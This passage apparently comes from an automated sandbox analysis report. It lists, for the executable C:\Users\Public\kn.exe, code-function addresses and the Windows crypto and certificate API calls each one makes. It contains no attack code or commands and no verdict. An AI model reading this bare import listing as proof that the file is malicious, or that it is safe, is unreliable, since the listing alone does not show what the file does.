                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,9_2_00007FF7F13D184C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,9_2_00007FF7F13B18DC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13538FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF7F13538FC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F14198B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB8D0 I_CryptGetLruEntryData,#357,9_2_00007FF7F13CB8D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,9_2_00007FF7F13AF774
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E5768
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B577C #360,#358,CryptDecodeObject,GetLastError,#357,9_2_00007FF7F13B577C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FB794 CryptExportPublicKeyInfoEx,SetLastError,9_2_00007FF7F13FB794
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,9_2_00007FF7F135B788
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,9_2_00007FF7F137D790
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,9_2_00007FF7F140D750
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,9_2_00007FF7F13F97E4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,9_2_00007FF7F140F7FC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,9_2_00007FF7F13CB808
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF7F137F810
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E37A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13817D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,9_2_00007FF7F13817D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,9_2_00007FF7F13F9A58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E7A70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,9_2_00007FF7F140FA84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E1A44
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1373A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1373A40
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FBA50 CryptSignCertificate,SetLastError,9_2_00007FF7F13FBA50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF7F13D9AF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,9_2_00007FF7F13A3B14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445AA8 CryptDecodeObjectEx,9_2_00007FF7F1445AA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1409970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF7F1409970
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,9_2_00007FF7F13C597C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1377988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,9_2_00007FF7F1377988
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F143B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,9_2_00007FF7F143B980
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1363918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1363918
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,9_2_00007FF7F13E391C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,9_2_00007FF7F140F918
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139F944 CryptDecodeObject,GetLastError,#357,9_2_00007FF7F139F944
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB950 I_CryptGetLruEntryData,#357,9_2_00007FF7F13CB950
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,9_2_00007FF7F141BA14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF7F136F9B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,9_2_00007FF7F13CB9CC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1393C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F1393C60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,9_2_00007FF7F13D1C84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,9_2_00007FF7F137FC20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F139FC34
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445C54 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF7F1445C54
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1381C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,9_2_00007FF7F1381C50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,9_2_00007FF7F13D5CE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,9_2_00007FF7F1417B60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445B90 CryptDecodeObjectEx,memmove,9_2_00007FF7F1445B90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,9_2_00007FF7F140FB94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,9_2_00007FF7F136BB80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,9_2_00007FF7F141BB50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13ABB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13ABB38
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,9_2_00007FF7F13EFB50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1415B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,9_2_00007FF7F1415B44
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E3BEB
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1345BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F1345BA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13EBBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1369BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,9_2_00007FF7F1369BC8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,9_2_00007FF7F140DE70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13D1E2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,9_2_00007FF7F1445E3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,9_2_00007FF7F1417EE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,9_2_00007FF7F13D5F04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1397F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,9_2_00007FF7F1397F14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,9_2_00007FF7F139DEA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13CDEB0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,9_2_00007FF7F13C3D60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445D74 CryptDecodeObjectEx,strcmp,strcmp,9_2_00007FF7F1445D74
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13A1D70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1399D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1399D6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139DD80 CertFindExtension,CryptDecodeObject,9_2_00007FF7F139DD80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,9_2_00007FF7F13F5D80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140FD2C CryptDecryptMessage,GetLastError,#357,9_2_00007FF7F140FD2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,9_2_00007FF7F13FDD1C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,9_2_00007FF7F141BD3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,9_2_00007FF7F1417D3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1351DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,9_2_00007FF7F1351DE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,9_2_00007FF7F1375DF7
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F1375DA1
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,9_2_00007FF7F13B4070
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,9_2_00007FF7F140E044
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13760DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F13760DA
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,9_2_00007FF7F137FF64
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13E9F90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445F20 CryptDecodeObjectEx,9_2_00007FF7F1445F20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,9_2_00007FF7F13B5F54
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF7F1445FF0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F1375FE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13E5FA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F140E274
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13B6280
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1402278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,9_2_00007FF7F1402278
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,9_2_00007FF7F144A2E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1380300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,9_2_00007FF7F1380300
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,9_2_00007FF7F1418298
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF7F13A417C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13C6194
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144613C CryptDecodeObjectEx,9_2_00007FF7F144613C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,9_2_00007FF7F13CA1E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF7F13DE1F8
